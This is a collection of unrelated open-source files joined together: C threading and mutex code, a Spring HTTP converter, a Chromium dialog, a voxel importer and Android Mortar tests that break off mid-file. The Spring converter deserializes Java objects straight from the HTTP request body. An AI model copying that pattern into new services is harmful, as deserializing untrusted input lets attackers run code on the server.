static void Thread_New(var self, var args) {
struct Thread* t = self;
t->func = empty(args) ? NULL : get(args, $I(0));
t->args = NULL;
t->is_main = false;
t->is_running = false;
t->tls = new_raw(Table, String, Ref);
}
static void Thread_Del(var self) {
struct Thread* t = self;
#ifdef CELLO_WINDOWS
CloseHandle(t->thread);
#endif
if (t->args isnt NULL) { del_raw(t->args); }
del_raw(t->tls);
}
static int64_t Thread_C_Int(var self) {
struct Thread* t = self;
if (not t->is_running) {
throw(ValueError, "Cannot get thread ID, thread not running!");
}
#if defined(CELLO_UNIX)
return (int64_t)t->thread;
#elif defined(CELLO_WINDOWS)
return (int64_t)t->id;
#else
return 0;
#endif
}
static void Thread_Assign(var self, var obj) {
struct Thread* t = self;
struct Thread* o = cast(obj, Thread);
t->func = o->func;
t->tls = t->tls ? t->tls : alloc_raw(Table);
assign(t->tls, o->tls);
}
static int Thread_Cmp(var self, var obj) {
return (int)(Thread_C_Int(self) - c_int(obj));
}
static uint64_t Thread_Hash(var self) {
return Thread_C_Int(self);
}
static bool Thread_TLS_Key_Created = false;
#if defined(CELLO_UNIX)
static pthread_key_t Thread_Key_Wrapper;
static void Thread_TLS_Key_Create(void) {
pthread_key_create(&Thread_Key_Wrapper, NULL);
}
static void Thread_TLS_Key_Delete(void) {
pthread_key_delete(Thread_Key_Wrapper);
}
static var Thread_Init_Run(var self) {
struct Thread* t = self;
pthread_setspecific(Thread_Key_Wrapper, t);
t->is_running = true;
#ifndef CELLO_NGC
var bottom = NULL;
var gc = new_raw(GC, $R(&bottom));
#endif
var exc = new_raw(Exception);
var x = call_with(t->func, t->args);
del_raw(t->args);
t->args = NULL;
del_raw(exc);
#ifndef CELLO_NGC
del_raw(gc);
#endif
return x;
}
#elif defined(CELLO_WINDOWS)
static DWORD Thread_Key_Wrapper;
static void Thread_TLS_Key_Create(void) {
Thread_Key_Wrapper = TlsAlloc();
}
static void Thread_TLS_Key_Delete(void) {
TlsFree(Thread_Key_Wrapper);
}
static DWORD Thread_Init_Run(var self) {
struct Thread* t = self;
TlsSetValue(Thread_Key_Wrapper, t);
t->is_running = true;
var ex = new_raw(Exception);
#ifndef CELLO_NGC
var bottom = NULL;
var gc = new_raw(GC, $R(&bottom));
#endif
call_with(t->func, t->args);
del_raw(t->args);
t->args = NULL;
#ifndef CELLO_NGC
del_raw(gc);
#endif
del_raw(ex);
return 0;
}
#endif
static var Thread_Call(var self, var args) {
struct Thread* t = self;
t->args = assign(alloc_raw(type_of(args)), args);
/* Call Init Thread & Run */
#if defined(CELLO_UNIX)
/* Setup Thread Local Storage */
if (not Thread_TLS_Key_Created) {
Thread_TLS_Key_Create();
Thread_TLS_Key_Created = true;
atexit(Thread_TLS_Key_Delete);
}
int err = pthread_create(&t->thread, NULL, Thread_Init_Run, t);
if (err is EINVAL) {
throw(ValueError, "Invalid Argument to Thread Creation");
}
if (err is EAGAIN) {
throw(OutOfMemoryError, "Not enough resources to create another Thread");
}
if (err is EBUSY) {
throw(BusyError, "System is too busy to create thread");
}
#elif defined(CELLO_WINDOWS)
/* Setup Thread Local Storage */
if (not Thread_TLS_Key_Created) {
Thread_TLS_Key_Create();
Thread_TLS_Key_Created = true;
atexit(Thread_TLS_Key_Delete);
}
t->thread = CreateThread(NULL, 0,
(LPTHREAD_START_ROUTINE)Thread_Init_Run, t, 0, &t->id);
if (t->thread is NULL) {
throw(ValueError, "Unable to Create WinThread");
}
#else
throw(ResourceError, "Unsupported Threading Environment");
#endif
return self;
}
static var Thread_Main = NULL;
static var Exception_Main = NULL;
static void Thread_Main_Del(void) {
del_raw(Exception_Main);
del_raw(Thread_Main);
}
static var Thread_Current(void) {
if (not Thread_TLS_Key_Created) {
Thread_TLS_Key_Create();
Thread_TLS_Key_Created = true;
atexit(Thread_TLS_Key_Delete);
}
#if defined(CELLO_UNIX)
var wrapper = pthread_getspecific(Thread_Key_Wrapper);
#elif defined(CELLO_WINDOWS)
var wrapper = TlsGetValue(Thread_Key_Wrapper);
#else
var wrapper = NULL;
#endif
/*
** Here is a nasty one. On OSX instead of
** returning NULL for an unset key it
** decides to return uninitialized rubbish
** (even though the spec says otherwise).
**
** Luckily we can test directly for the main
** thread on OSX using this non-portable method
*/
#ifdef CELLO_MAC
if (pthread_main_np()) { wrapper = NULL; }
#endif
if (wrapper is NULL) {
if (Thread_Main is NULL) {
Thread_Main = new_raw(Thread);
Exception_Main = new_raw(Exception);
atexit(Thread_Main_Del);
}
struct Thread* t = Thread_Main;
t->is_main = true;
t->is_running = true;
#if defined(CELLO_UNIX)
t->thread = pthread_self();
#elif defined(CELLO_WINDOWS)
t->thread = GetCurrentThread();
#endif
return Thread_Main;
}
return wrapper;
}
static void Thread_Start(var self) {
call(self);
}
static void Thread_Stop(var self) {
struct Thread* t = self;
#if defined(CELLO_UNIX)
if (not t->thread) { return; }
int err = pthread_kill(t->thread, SIGINT);
if (err is EINVAL) { throw(ValueError, "Invalid Argument to Thread Stop"); }
if (err is ESRCH) { throw(ValueError, "Invalid Thread"); }
#elif defined(CELLO_WINDOWS)
if (not t->thread) { return; }
TerminateThread(t->thread, FALSE);
#endif
}
static void Thread_Join(var self) {
struct Thread* t = self;
#if defined(CELLO_UNIX)
if (not t->thread) { return; }
int err = pthread_join(t->thread, NULL);
if (err is EINVAL) { throw(ValueError, "Invalid Argument to Thread Join"); }
if (err is ESRCH) { throw(ValueError, "Invalid Thread"); }
#elif defined(CELLO_WINDOWS)
if (not t->thread) { return; }
WaitForSingleObject(t->thread, INFINITE);
#endif
}
static bool Thread_Running(var self) {
struct Thread* t = self;
return t->is_running;
}
static var Thread_Get(var self, var key) {
struct Thread* t = self;
return deref(get(t->tls, key));
}
static void Thread_Set(var self, var key, var val) {
struct Thread* t = self;
set(t->tls, key, $R(val));
}
static bool Thread_Mem(var self, var key) {
struct Thread* t = self;
return mem(t->tls, key);
}
static void Thread_Rem(var self, var key) {
struct Thread* t = self;
rem(t->tls, key);
}
static var Thread_Key_Type(var self) {
struct Thread* t = self;
return key_type(t->tls);
}
static var Thread_Val_Type(var self) {
struct Thread* t = self;
return val_type(t->tls);
}
static void Thread_Mark(var self, var gc, void(*f)(var,void*)) {
struct Thread* t = self;
mark(t->tls, gc, f);
}
var Thread = Cello(Thread,
Instance(Doc,
Thread_Name, Thread_Brief, Thread_Description,
NULL, Thread_Examples, NULL),
Instance(New, Thread_New, Thread_Del),
Instance(Assign, Thread_Assign),
Instance(Cmp, Thread_Cmp),
Instance(Hash, Thread_Hash),
Instance(Call, Thread_Call),
Instance(Current, Thread_Current),
Instance(Mark, Thread_Mark),
Instance(Start, Thread_Start, Thread_Stop, Thread_Join, Thread_Running),
Instance(C_Int, Thread_C_Int),
Instance(Get, Thread_Get, Thread_Set, Thread_Mem, Thread_Rem));
static const char* Lock_Name(void) {
return "Lock";
}
static const char* Lock_Brief(void) {
return "Exclusive Resource";
}
static const char* Lock_Description(void) {
return
"The `Lock` class can be implemented by types to limit the access to them. "
"For example this class is implemented by the `Mutex` type to provide "
"mutual exclusion across Threads.";
}
static const char* Lock_Definition(void) {
return
"struct Lock {\n"
" void (*lock)(var);\n"
" void (*unlock)(var);\n"
" bool (*trylock)(var);\n"
"};\n";
}
static struct Method* Lock_Methods(void) {
static struct Method methods[] = {
{
"lock",
"void lock(var self);",
"Wait until a lock can be aquired on object `self`."
}, {
"trylock",
"bool trylock(var self);",
"Try to acquire a lock on object `self`. Returns `true` on success and "
"`false` if the resource is busy."
}, {
"unlock",
"void unlock(var self);",
"Release lock on object `self`."
}, {NULL, NULL, NULL}
};
return methods;
}
static struct Example* Lock_Examples(void) {
static struct Example examples[] = {
{
"Usage",
"var x = new(Mutex);\n"
"lock(x); /* Lock Mutex */ \n"
"print(\"Inside Mutex!\\n\");\n"
"unlock(x); /* Unlock Mutex */"
}, {NULL, NULL}
};
return examples;
}
var Lock = Cello(Lock,
Instance(Doc,
Lock_Name, Lock_Brief, Lock_Description,
Lock_Definition, Lock_Examples, Lock_Methods));
void lock(var self) {
method(self, Lock, lock);
}
void unlock(var self) {
method(self, Lock, unlock);
}
bool trylock(var self) {
return method(self, Lock, trylock);
}
struct Mutex {
#if defined(CELLO_UNIX)
pthread_mutex_t mutex;
#elif defined(CELLO_WINDOWS)
HANDLE mutex;
#endif
};
static const char* Mutex_Name(void) {
return "Mutex";
}
static const char* Mutex_Brief(void) {
return "Mutual Exclusion Lock";
}
static const char* Mutex_Description(void) {
return
"The `Mutex` type can be used to gain mutual exclusion across Threads for "
"access to some resource.";
}
static struct Example* Mutex_Examples(void) {
static struct Example examples[] = {
{
"Usage",
"var x = new(Mutex);\n"
"with (mut in x) { /* Lock Mutex */ \n"
" print(\"Inside Mutex!\\n\");\n"
"} /* Unlock Mutex */"
}, {NULL, NULL}
};
return examples;
}
static void Mutex_New(var self, var args) {
struct Mutex* m = self;
#if defined(CELLO_UNIX)
pthread_mutex_init(&m->mutex, NULL);
#elif defined(CELLO_WINDOWS)
m->mutex = CreateMutex(NULL, false, NULL);
#endif
}
static void Mutex_Del(var self) {
struct Mutex* m = self;
#if defined(CELLO_UNIX)
pthread_mutex_destroy(&m->mutex);
#elif defined(CELLO_WINDOWS)
CloseHandle(m->mutex);
#endif
}
static void Mutex_Lock(var self) {
struct Mutex* m = self;
#if defined(CELLO_UNIX)
int err = pthread_mutex_lock(&m->mutex);
if (err is EINVAL) {
throw(ValueError, "Invalid Argument to Mutex Lock");
}
if (err is EDEADLK) {
throw(ResourceError, "Attempt to relock already held mutex");
}
#elif defined(CELLO_WINDOWS)
WaitForSingleObject(m->mutex, INFINITE);
#endif
}
static bool Mutex_Trylock(var self) {
struct Mutex* m = self;
#if defined(CELLO_UNIX)
int err = pthread_mutex_trylock(&m->mutex);
if (err == EBUSY) { return false; }
if (err is EINVAL) {
throw(ValueError, "Invalid Argument to Mutex Lock Try");
}
return true;
#elif defined(CELLO_WINDOWS)
return not (WaitForSingleObject(m->mutex, 0) is WAIT_TIMEOUT);
#else
return true;
#endif
}
static void Mutex_Unlock(var self) {
struct Mutex* m = cast(self, Mutex);
#if defined(CELLO_UNIX)
int err = pthread_mutex_unlock(&m->mutex);
if (err is EINVAL) { throw(ValueError, "Invalid Argument to Mutex Unlock"); }
if (err is EPERM) { throw(ResourceError, "Mutex cannot be held by caller"); }
#elif defined(CELLO_WINDOWS)
ReleaseMutex(m->mutex);
#endif
}
var Mutex = Cello(Mutex,
Instance(Doc,
Mutex_Name, Mutex_Brief, Mutex_Description, NULL, Mutex_Examples, NULL),
Instance(New, Mutex_New, Mutex_Del),
Instance(Lock, Mutex_Lock, Mutex_Unlock, Mutex_Trylock),
Instance(Start, Mutex_Lock, Mutex_Unlock, NULL));
| 6,152 |
1,093 | /*
* Copyright 2002-2019 the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.springframework.integration.http.converter;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import org.springframework.http.HttpInputMessage;
import org.springframework.http.HttpOutputMessage;
import org.springframework.http.MediaType;
import org.springframework.http.converter.AbstractHttpMessageConverter;
import org.springframework.util.FileCopyUtils;
/**
* An {@link org.springframework.http.converter.HttpMessageConverter} implementation for
* {@link Serializable} instances.
*
* @author <NAME>
* @author <NAME>
* @author <NAME>
*
* @since 2.0
*/
public class SerializingHttpMessageConverter extends AbstractHttpMessageConverter<Serializable> {
private static final MediaType APPLICATION_JAVA_SERIALIZED_OBJECT =
new MediaType("application", "x-java-serialized-object");
/** Creates a new instance of the {@code SerializingHttpMessageConverter}. */
public SerializingHttpMessageConverter() {
super(APPLICATION_JAVA_SERIALIZED_OBJECT);
}
@Override
public boolean supports(Class<?> clazz) {
return Serializable.class.isAssignableFrom(clazz);
}
@Override
public boolean canWrite(Class<?> clazz, MediaType mediaType) {
return Serializable.class.isAssignableFrom(clazz) && canWrite(mediaType);
}
@Override
@SuppressWarnings("rawtypes")
public Serializable readInternal(Class clazz, HttpInputMessage inputMessage) throws IOException {
try {
return (Serializable) new ObjectInputStream(inputMessage.getBody()).readObject(); //NOSONAR
}
catch (ClassNotFoundException e) {
throw new IllegalArgumentException(e);
}
}
@Override
protected void writeInternal(Serializable object, HttpOutputMessage outputMessage) throws IOException {
ByteArrayOutputStream byteStream = new ByteArrayOutputStream();
ObjectOutputStream objectStream = new ObjectOutputStream(byteStream);
objectStream.writeObject(object);
objectStream.flush();
objectStream.close();
byte[] bytes = byteStream.toByteArray();
FileCopyUtils.copy(bytes, outputMessage.getBody());
}
}
| 817 |
336 | <gh_stars>100-1000
/*
* Copyright 2019 Apple Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License.
*
* You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
*/
package com.shazam.chimprunner;
public class Defaults {
public static final String CHIMP_OUTPUT = "chimp-output";
static final int DDMS_TIMEOUT = 30000;
static final int ADB_MAX_TIME_TO_OUTPUT_RESPONSE = 30000;
static final int ITERATIONS = 7;
static final int ITERATIONS_TO_SKIP = 2;
}
| 267 |
9,959 | import lombok.experimental.*;
class WitherLegacyStar {
@Wither int i;
WitherLegacyStar(int i) {
this.i = i;
}
}
| 54 |
777 | <gh_stars>100-1000
// Copyright 2014 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "chrome/browser/ui/views/extensions/bookmark_app_confirmation_view.h"
#include "base/callback_helpers.h"
#include "base/strings/string16.h"
#include "base/strings/string_util.h"
#include "build/build_config.h"
#include "chrome/grit/generated_resources.h"
#include "components/constrained_window/constrained_window_views.h"
#include "components/strings/grit/components_strings.h"
#include "content/public/browser/web_contents.h"
#include "extensions/common/constants.h"
#include "ui/accessibility/ax_node_data.h"
#include "ui/base/l10n/l10n_util.h"
#include "ui/base/resource/resource_bundle.h"
#include "ui/gfx/image/image_skia.h"
#include "ui/gfx/image/image_skia_source.h"
#include "ui/views/controls/button/checkbox.h"
#include "ui/views/controls/image_view.h"
#include "ui/views/controls/textfield/textfield.h"
#include "ui/views/layout/box_layout.h"
#include "ui/views/layout/layout_constants.h"
#include "ui/views/widget/widget.h"
#include "ui/views/window/dialog_client_view.h"
namespace {
// Minimum width of the the bubble.
const int kMinBubbleWidth = 300;
// Size of the icon.
const int kIconSize = extension_misc::EXTENSION_ICON_MEDIUM;
class WebAppInfoImageSource : public gfx::ImageSkiaSource {
public:
WebAppInfoImageSource(int dip_size, const WebApplicationInfo& info)
: dip_size_(dip_size), info_(info) {}
~WebAppInfoImageSource() override {}
private:
gfx::ImageSkiaRep GetImageForScale(float scale) override {
int size = base::saturated_cast<int>(dip_size_ * scale);
for (const auto& icon_info : info_.icons) {
if (icon_info.width == size)
return gfx::ImageSkiaRep(icon_info.data, scale);
}
return gfx::ImageSkiaRep();
}
int dip_size_;
WebApplicationInfo info_;
};
} // namespace
BookmarkAppConfirmationView::~BookmarkAppConfirmationView() {}
// static
void BookmarkAppConfirmationView::CreateAndShow(
gfx::NativeWindow parent,
const WebApplicationInfo& web_app_info,
const BrowserWindow::ShowBookmarkAppBubbleCallback& callback) {
constrained_window::CreateBrowserModalDialogViews(
new BookmarkAppConfirmationView(web_app_info, callback), parent)
->Show();
}
BookmarkAppConfirmationView::BookmarkAppConfirmationView(
const WebApplicationInfo& web_app_info,
const BrowserWindow::ShowBookmarkAppBubbleCallback& callback)
: web_app_info_(web_app_info),
callback_(callback),
open_as_window_checkbox_(nullptr),
title_tf_(nullptr) {
views::BoxLayout* layout = new views::BoxLayout(
views::BoxLayout::kHorizontal, views::kButtonHEdgeMarginNew,
views::kButtonHEdgeMarginNew, views::kButtonHEdgeMarginNew);
layout->set_cross_axis_alignment(
views::BoxLayout::CROSS_AXIS_ALIGNMENT_CENTER);
SetLayoutManager(layout);
views::ImageView* icon_image_view = new views::ImageView();
gfx::Size image_size(kIconSize, kIconSize);
gfx::ImageSkia image(new WebAppInfoImageSource(kIconSize, web_app_info_),
image_size);
icon_image_view->SetImageSize(image_size);
icon_image_view->SetImage(image);
AddChildView(icon_image_view);
title_tf_ = new views::Textfield();
title_tf_->SetText(web_app_info_.title);
title_tf_->SetAccessibleName(
l10n_util::GetStringUTF16(IDS_BOOKMARK_APP_AX_BUBBLE_NAME_LABEL));
title_tf_->set_controller(this);
AddChildView(title_tf_);
layout->SetFlexForView(title_tf_, 1);
title_tf_->SelectAll(true);
}
views::View* BookmarkAppConfirmationView::GetInitiallyFocusedView() {
return title_tf_;
}
ui::ModalType BookmarkAppConfirmationView::GetModalType() const {
return ui::MODAL_TYPE_WINDOW;
}
base::string16 BookmarkAppConfirmationView::GetWindowTitle() const {
#if defined(USE_ASH)
int ids = IDS_ADD_TO_SHELF_BUBBLE_TITLE;
#else
int ids = IDS_ADD_TO_DESKTOP_BUBBLE_TITLE;
#endif
return l10n_util::GetStringUTF16(ids);
}
bool BookmarkAppConfirmationView::ShouldShowCloseButton() const {
return false;
}
void BookmarkAppConfirmationView::WindowClosing() {
if (!callback_.is_null())
callback_.Run(false, web_app_info_);
}
views::View* BookmarkAppConfirmationView::CreateExtraView() {
open_as_window_checkbox_ = new views::Checkbox(
l10n_util::GetStringUTF16(IDS_BOOKMARK_APP_BUBBLE_OPEN_AS_WINDOW));
open_as_window_checkbox_->SetChecked(web_app_info_.open_as_window);
return open_as_window_checkbox_;
}
bool BookmarkAppConfirmationView::Accept() {
web_app_info_.title = GetTrimmedTitle();
web_app_info_.open_as_window = open_as_window_checkbox_->checked();
base::ResetAndReturn(&callback_).Run(true, web_app_info_);
return true;
}
base::string16 BookmarkAppConfirmationView::GetDialogButtonLabel(
ui::DialogButton button) const {
return l10n_util::GetStringUTF16(button == ui::DIALOG_BUTTON_OK ? IDS_ADD
: IDS_CANCEL);
}
bool BookmarkAppConfirmationView::IsDialogButtonEnabled(
ui::DialogButton button) const {
return button == ui::DIALOG_BUTTON_OK ? !GetTrimmedTitle().empty() : true;
}
gfx::Size BookmarkAppConfirmationView::GetMinimumSize() const {
gfx::Size size(views::DialogDelegateView::GetPreferredSize());
size.SetToMax(gfx::Size(kMinBubbleWidth, 0));
return size;
}
void BookmarkAppConfirmationView::ContentsChanged(
views::Textfield* sender,
const base::string16& new_contents) {
DCHECK_EQ(title_tf_, sender);
GetDialogClientView()->UpdateDialogButtons();
}
base::string16 BookmarkAppConfirmationView::GetTrimmedTitle() const {
base::string16 title(title_tf_->text());
base::TrimWhitespace(title, base::TRIM_ALL, &title);
return title;
}
| 2,162 |
370 | <reponame>gerritg/voxelshop
package com.vitco.app.importer;
import com.vitco.app.util.file.FileIn;
import com.vitco.app.util.file.RandomAccessFileIn;
import java.awt.*;
import java.io.File;
import java.io.IOException;
/**
* RawVox importer
*/
public class RawVoxImporter extends AbstractImporter {
// the voxel color is not defined in the format, so
// we need to define it here
private static final int voxelRGB = new Color(158, 194, 88).getRGB();
// the size of the block that contains the voxel as written in file
private int sx = 0, sy = 0, sz = 0;
public final double[] getSize() {
return new double[] {sx, sy, sz};
}
// constructor
public RawVoxImporter(File file, String layerName) throws IOException {
super(file, layerName);
}
// read file - returns true if file has loaded correctly
@Override
protected boolean read(FileIn fileIn, RandomAccessFileIn raf) throws IOException {
// header
String header = fileIn.readASCIIString(4);
if (!header.startsWith("XOVR")) { // check format identifier
return false;
}
// read size of the voxel area
sx = fileIn.readIntRev();
sy = fileIn.readIntRev();
sz = fileIn.readIntRev();
// sanity check
if (sx == 0 || sy == 0 || sz == 0) {
// required parameter missing/wrong
return false;
}
// read bits per voxel
int bitsPerVoxel = fileIn.readIntRev();
// sanity check
if (bitsPerVoxel != 8 && bitsPerVoxel != 16 && bitsPerVoxel != 32) {
return false;
}
// tmp value
int bVal = 0;
// read raw voxel data
for (int z = 0; z < sz; z++) {
for (int y = 0; y < sy; y++) {
for (int x = 0; x < sx; x++) {
if (bitsPerVoxel == 8) {
bVal = fileIn.readByteUnsigned();
} else if (bitsPerVoxel == 16) {
bVal = fileIn.readByteUnsigned() + fileIn.readByteUnsigned();
} else if (bitsPerVoxel == 32) {
bVal = fileIn.readByteUnsigned() + fileIn.readByteUnsigned() + fileIn.readByteUnsigned() + fileIn.readByteUnsigned();
}
if (bVal > 0) {
addVoxel(-z,-y,x,voxelRGB);
}
}
}
}
return true;
}
}
| 1,200 |
1,819 | package mortar.bundler;
import android.content.Context;
import android.os.Bundle;
import java.util.ArrayList;
import java.util.List;
import java.util.concurrent.atomic.AtomicBoolean;
import java.util.concurrent.atomic.AtomicInteger;
import junit.framework.TestCase;
import mortar.MortarScope;
import mortar.Scoped;
import org.junit.Before;
import org.junit.Test;
import org.junit.runner.RunWith;
import org.mockito.Mock;
import org.mockito.invocation.InvocationOnMock;
import org.mockito.stubbing.Answer;
import org.robolectric.RobolectricTestRunner;
import org.robolectric.annotation.Config;
import static mortar.bundler.BundleService.getBundleService;
import static mortar.bundler.BundleServiceRunner.getBundleServiceRunner;
import static org.fest.assertions.api.Assertions.assertThat;
import static org.mockito.Matchers.anyString;
import static org.mockito.Mockito.mock;
import static org.mockito.Mockito.times;
import static org.mockito.Mockito.verify;
import static org.mockito.Mockito.verifyNoMoreInteractions;
import static org.mockito.Mockito.when;
import static org.mockito.MockitoAnnotations.initMocks;
// Robolectric allows us to use Bundles.
@RunWith(RobolectricTestRunner.class) @Config(manifest = Config.NONE) public class BundleServiceTest
extends TestCase {
@Mock Scoped scoped;
private MortarScope activityScope;
@Before public void setUp() {
initMocks(this);
newProcess();
}
@Test(expected = IllegalArgumentException.class) public void nonNullKeyRequired() {
getBundleService(activityScope).register(mock(Bundler.class));
}
@Test(expected = IllegalArgumentException.class) public void nonEmptyKeyRequired() {
Bundler mock = mock(Bundler.class);
when(mock.getMortarBundleKey()).thenReturn("");
getBundleService(activityScope).register(mock);
}
@Test public void lifeCycle() {
doLifecycleTest(activityScope);
}
@Test public void childLifeCycle() {
doLifecycleTest(activityScope.buildChild().build("child"));
}
private void doLifecycleTest(MortarScope registerScope) {
MyBundler able = new MyBundler("able");
MyBundler baker = new MyBundler("baker");
registerScope.register(scoped);
getBundleService(registerScope).register(able);
getBundleService(registerScope).register(baker);
// onEnterScope is called immediately.
verify(scoped).onEnterScope(registerScope);
assertThat(able.registered).isSameAs(registerScope);
assertThat(baker.registered).isSameAs(registerScope);
// Load is called immediately.
assertThat(able.loaded).isTrue();
assertThat(able.lastLoaded).isNull();
able.reset();
assertThat(baker.loaded).isTrue();
assertThat(baker.lastLoaded).isNull();
baker.reset();
getBundleServiceRunner(activityScope).onCreate(null);
// Create loads all registrants.
assertThat(able.loaded).isTrue();
assertThat(able.lastLoaded).isNull();
able.reset();
assertThat(baker.loaded).isTrue();
assertThat(baker.lastLoaded).isNull();
baker.reset();
// When we save, the bundler gets its own bundle to write to.
Bundle saved = new Bundle();
getBundleServiceRunner(activityScope).onSaveInstanceState(saved);
assertThat(able.lastSaved).isNotNull();
assertThat(baker.lastSaved).isNotNull();
assertThat(able.lastSaved).isNotSameAs(baker.lastSaved);
// If the bundler is re-registered, it loads again.
able.lastLoaded = null;
getBundleService(registerScope).register(able);
assertThat(able.lastLoaded).isSameAs(able.lastSaved);
// A new activity instance appears
able.reset();
baker.reset();
getBundleServiceRunner(activityScope).onSaveInstanceState(saved);
Bundle fromNewActivity = new Bundle(saved);
getBundleServiceRunner(activityScope).onCreate(fromNewActivity);
assertThat(able.lastLoaded).isNotNull();
verifyNoMoreInteractions(scoped);
activityScope.destroy();
assertThat(able.destroyed).isTrue();
verify(scoped).onExitScope();
}
@Test public void cannotGetBundleServiceRunnerFromDestroyed() {
activityScope.destroy();
IllegalStateException caught = null;
try {
getBundleServiceRunner(activityScope);
} catch (IllegalStateException e) {
caught = e;
}
assertThat(caught).isNotNull();
}
@Test public void cannotGetBundleServiceRunnerFromContextOfDestroyed() {
Context activity = mockContext(activityScope);
activityScope.destroy();
IllegalStateException caught = null;
try {
getBundleServiceRunner(activity);
} catch (IllegalStateException e) {
caught = e;
}
assertThat(caught).isNotNull();
}
@Test public void cannotGetBundleServiceForDestroyed() {
MortarScope child = activityScope.buildChild().build("child");
child.destroy();
IllegalStateException caught = null;
try {
getBundleService(child);
} catch (IllegalStateException e) {
caught = e;
}
assertThat(caught).isNotNull();
}
@Test public void cannotGetBundleServiceFromContextOfDestroyed() {
MortarScope child = activityScope.buildChild().build("child");
Context context = mockContext(child);
child.destroy();
IllegalStateException caught = null;
try {
getBundleService(context);
} catch (IllegalStateException e) {
caught = e;
}
assertThat(caught).isNotNull();
}
@Test public void onRegisteredIsDebounced() {
activityScope.register(scoped);
activityScope.register(scoped);
verify(scoped, times(1)).onEnterScope(activityScope);
}
@Test public void childInfoSurvivesProcessDeath() {
FauxActivity activity = new FauxActivity();
activity.create(null);
Bundle bundle = new Bundle();
getBundleServiceRunner(activityScope).onSaveInstanceState(bundle);
// Process death: new copy of the bundle, new scope and activity instances
bundle = new Bundle(bundle);
// Activity scopes often include transient values like task id. Make sure
// BundlerServiceRunner isn't stymied by that.
newProcess("anotherActivity");
activity = new FauxActivity();
activity.create(bundle);
assertThat(activity.rootBundler.lastLoaded).isNotNull();
assertThat(activity.childBundler.lastLoaded).isNotNull();
}
@Test public void handlesRegisterFromOnLoadBeforeCreate() {
final MyBundler bundler = new MyBundler("inner");
getBundleService(activityScope).register(new MyBundler("outer") {
@Override public void onLoad(Bundle savedInstanceState) {
super.onLoad(savedInstanceState);
getBundleService(activityScope).register(bundler);
}
});
// The recursive register call loaded immediately.
assertThat(bundler.loaded).isTrue();
// And it was registered: a create call reloads it.
bundler.reset();
getBundleServiceRunner(activityScope).onCreate(null);
assertThat(bundler.loaded).isTrue();
}
@Test public void handlesRegisterFromOnLoadAfterCreate() {
final MyBundler bundler = new MyBundler("inner");
BundleServiceRunner bundleServiceRunner = getBundleServiceRunner(activityScope);
bundleServiceRunner.onCreate(null);
final BundleService bundleService = getBundleService(activityScope);
bundleService.register(new MyBundler("outer") {
@Override public void onLoad(Bundle savedInstanceState) {
bundleService.register(bundler);
}
});
// The recursive register call loaded immediately.
assertThat(bundler.loaded).isTrue();
// And it was registered: the next create call reloads it.
bundler.reset();
Bundle b = new Bundle();
bundleServiceRunner.onSaveInstanceState(b);
bundleServiceRunner.onCreate(b);
assertThat(bundler.loaded).isNotNull();
}
@Test public void cannotRegisterDuringOnSave() {
final MyBundler bundler = new MyBundler("inner");
final AtomicBoolean caught = new AtomicBoolean(false);
BundleServiceRunner bundleServiceRunner = getBundleServiceRunner(activityScope);
bundleServiceRunner.onCreate(null);
final BundleService bundleService = getBundleService(activityScope);
bundleService.register(new MyBundler("outer") {
@Override public void onSave(Bundle outState) {
super.onSave(outState);
try {
bundleService.register(bundler);
} catch (IllegalStateException e) {
caught.set(true);
}
}
});
assertThat(bundler.loaded).isFalse();
Bundle bundle = new Bundle();
bundleServiceRunner.onSaveInstanceState(bundle);
assertThat(caught.get()).isTrue();
}
@Test public void handlesReregistrationBeforeCreate() {
final AtomicInteger i = new AtomicInteger(0);
final BundleService bundleService = getBundleService(activityScope);
bundleService.register(new Bundler() {
@Override public String getMortarBundleKey() {
return "key";
}
@Override public void onEnterScope(MortarScope scope) {
}
@Override public void onLoad(Bundle savedInstanceState) {
if (i.incrementAndGet() < 1) bundleService.register(this);
}
@Override public void onSave(Bundle outState) {
throw new UnsupportedOperationException();
}
@Override public void onExitScope() {
throw new UnsupportedOperationException();
}
});
Bundle b = new Bundle();
getBundleServiceRunner(activityScope).onCreate(b);
assertThat(i.get()).isEqualTo(2);
}
@Test public void handlesReregistrationAfterCreate() {
Bundle b = new Bundle();
getBundleServiceRunner(activityScope).onCreate(b);
final AtomicInteger i = new AtomicInteger(0);
final BundleService bundleService = getBundleService(activityScope);
bundleService.register(new Bundler() {
@Override public String getMortarBundleKey() {
return "key";
}
@Override public void onEnterScope(MortarScope scope) {
}
@Override public void onLoad(Bundle savedInstanceState) {
if (i.incrementAndGet() < 1) bundleService.register(this);
}
@Override public void onSave(Bundle outState) {
throw new UnsupportedOperationException();
}
@Override public void onExitScope() {
throw new UnsupportedOperationException();
}
});
assertThat(i.get()).isEqualTo(1);
}
@Test public void handleDestroyFromEarlyLoad() {
final AtomicInteger loads = new AtomicInteger(0);
final AtomicInteger destroys = new AtomicInteger(0);
class Destroyer implements Bundler {
@Override public String getMortarBundleKey() {
return "k";
}
@Override public void onEnterScope(MortarScope scope) {
}
@Override public void onLoad(Bundle savedInstanceState) {
if (loads.incrementAndGet() > 2) {
activityScope.destroy();
}
}
@Override public void onSave(Bundle outState) {
throw new UnsupportedOperationException();
}
@Override public void onExitScope() {
destroys.incrementAndGet();
}
}
BundleService bundleService = getBundleService(activityScope);
bundleService.register(new Destroyer());
bundleService.register(new Destroyer());
Bundle b = new Bundle();
getBundleServiceRunner(activityScope).onCreate(b);
assertThat(loads.get()).isEqualTo(3);
assertThat(destroys.get()).isEqualTo(2);
}
@Test public void handlesDestroyFromOnSave() {
final AtomicInteger saves = new AtomicInteger(0);
final AtomicInteger destroys = new AtomicInteger(0);
class Destroyer implements Bundler {
@Override public String getMortarBundleKey() {
return "k";
}
